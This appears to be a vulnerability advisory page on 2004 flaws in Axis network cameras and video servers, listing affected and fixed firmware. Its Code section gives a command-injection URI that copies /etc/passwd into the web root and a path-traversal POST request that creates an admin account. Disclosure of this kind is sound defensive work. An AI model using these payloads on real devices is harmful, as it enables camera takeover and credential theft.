exploits , vulnerabilities , articles , Axis Network Camera And Video Server Multiple Vulnerabilities

Title	Axis Network Camera And Video Server Multiple Vulnerabilities
Published	2004-08-23-12:00AM
Updated	2004-08-31-08:49PM
Class	Design Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	bashis <mcw@wcd.se> disclosed these vulnerabilities.
Vulnerable	Axis Communications StorPoint CD Axis Communications Serial Server 2490 Axis Communications Network DVR 2460 Axis Communications MPEG2 Video Server 250S Axis Communications 250S Video Server 3.0 3 Axis Communications 250S MPEG2 Video Server 3.10 Axis Communications 2490 Serial Server 2.11.3 Axis Communications 2460 Network DVR 3.11 Axis Communications 2460 Network DVR 3.10 Axis Communications 2420 Video Server 2.34 Axis Communications 2420 Video Server 2.32 Axis Communications 2420 Network Camera 2.41 Axis Communications 2420 Network Camera 2.40 Axis Communications 2420 Network Camera 2.34 Axis Communications 2420 Network Camera 2.33 Axis Communications 2420 Network Camera 2.32 Axis Communications 2420 Network Camera 2.31 Axis Communications 2420 Network Camera 2.30 Axis Communications 2420 Network Camera 2.12 Axis Communications 2411 Video Server 3.13 Axis Communications 2411 Video Server 3.12 Axis Communications 2411 Video Server 3.12 Axis Communications 2401 Video Server 3.13 Axis Communications 2401 Video Server 3.12 Axis Communications 2401 Blade Video Server 3.12 Axis Communications 2401 Video Server 3.12 Axis Communications 2401 Video Server 2.34 Axis Communications 2401 Video Server 2.33 Axis Communications 2401 Video Server 2.32 Axis Communications 2401 Video Server 2.31 Axis Communications 2401 Video Server 2.30 Axis Communications 2401 Video Server 2.20 Axis Communications 2401 Video Server 1.15 Axis Communications 2401 Video Server 1.0 1 Axis Communications 2400 Video Server 3.12 Axis Communications 2400 Video Server 3.11 Axis Communications 2400 Blade Video Server 3.12 Axis Communications 2400 Video Server 2.34 Axis Communications 2400 Video Server 2.33 Axis Communications 2400 Video Server 2.32 Axis Communications 2400 Video Server 2.31 Axis Communications 2400 Video Server 2.30 Axis Communications 2400 Video Server 2.20 Axis Communications 2400 Video Server 2.0 Axis Communications 2400 Video Server 1.15 Axis Communications 2400 Video Server 1.12 Axis Communications 2400 Video Server 1.11 Axis Communications 2400 Video Server 1.10 Axis Communications 2400 Video Server 1.0 2 Axis Communications 2400 Video Server 1.0 1 Axis Communications 230 MPEG2 Video Server 3.11 Axis Communications 2130 PTZ Network Camera 2.40 Axis Communications 2130 PTZ Network Camera 2.34 Axis Communications 2130 PTZ Network Camera 2.32 Axis Communications 2130 PTZ Network Camera 2.31 Axis Communications 2130 PTZ Network Camera 2.30 Axis Communications 2120 Network Camera 2.41 Axis Communications 2120 Network Camera 2.40 Axis Communications 2120 Network Camera 2.34 Axis Communications 2120 Network Camera 2.32 Axis Communications 2120 Network Camera 2.31 Axis Communications 2120 Network Camera 2.30 Axis Communications 2120 Network Camera 2.12 Axis Communications 2110 Network Camera 2.41 Axis Communications 2110 Network Camera 2.40 Axis Communications 2110 Network Camera 2.34 Axis Communications 2110 Network Camera 2.32 Axis Communications 2110 Network Camera 2.31 Axis Communications 2110 Network Camera 2.30 Axis Communications 2110 Network Camera 2.12 Axis Communications 2100 Network Camera 2.41 Axis Communications 2100 Network Camera 2.40 Axis Communications 2100 Network Camera 2.34 Axis Communications 2100 Network Camera 2.33 Axis Communications 2100 Network Camera 2.32 Axis Communications 2100 Network Camera 2.31 Axis Communications 2100 Network Camera 2.30 Axis Communications 2100 Network Camera 2.12
Not Vulnerable	Axis Communications 250S MPEG-2 Video Server 3.20 Axis Communications 2460 Digital Video Recorder 3.13 Axis Communications 2420 Network Camera 2.42 Axis Communications 2411 Video Server 3.13 Axis Communications 2401 Blade Video Server 3.13 Axis Communications 2401 Video Server 3.13 Axis Communications 2401 Video Server 2.34.1 Axis Communications 2400 Video Server 3.13 Axis Communications 2400 Blade Video Server 3.13 Axis Communications 2400 Video Server 2.34.1 Axis Communications 230 MPEG-2 Video Server 3.20 Axis Communications 2130 Network Camera 2.42 Axis Communications 2120 Network Camera 2.42 Axis Communications 2110 Network Camera 2.42 Axis Communications 2100 Network Camera 2.42
Code	Exploits are not required for these vulnerabilities. Examples have been provided: A URI sufficient to exploit the first vulnerability: http://www.example.com/axis-cgi/io/virtualinput.cgi?x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwdx60 Example contents of POST data sufficient to exploit the second vulnerability: POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0 Content-Length: 250 Pragma: no-cache conf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&users=wh00t&username=wh00t&password1=wh00t&password2=wh00t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-17 Drupal Sections Module HTML Injection Vulnerability
2009-12-17 Mozilla Firefox and SeaMonkey Theora Video Library Remote Integer Overflow Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Insecure Protocol Location Bar Spoofing Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Content Injection Spoofing Vulnerability
2009-12-17 Mozilla Firefox/SeaMonkey GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability
2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities
2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability
2009-12-16 Horde Application Framework Administration Interface Cross-Site Scripting Vulnerability
2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability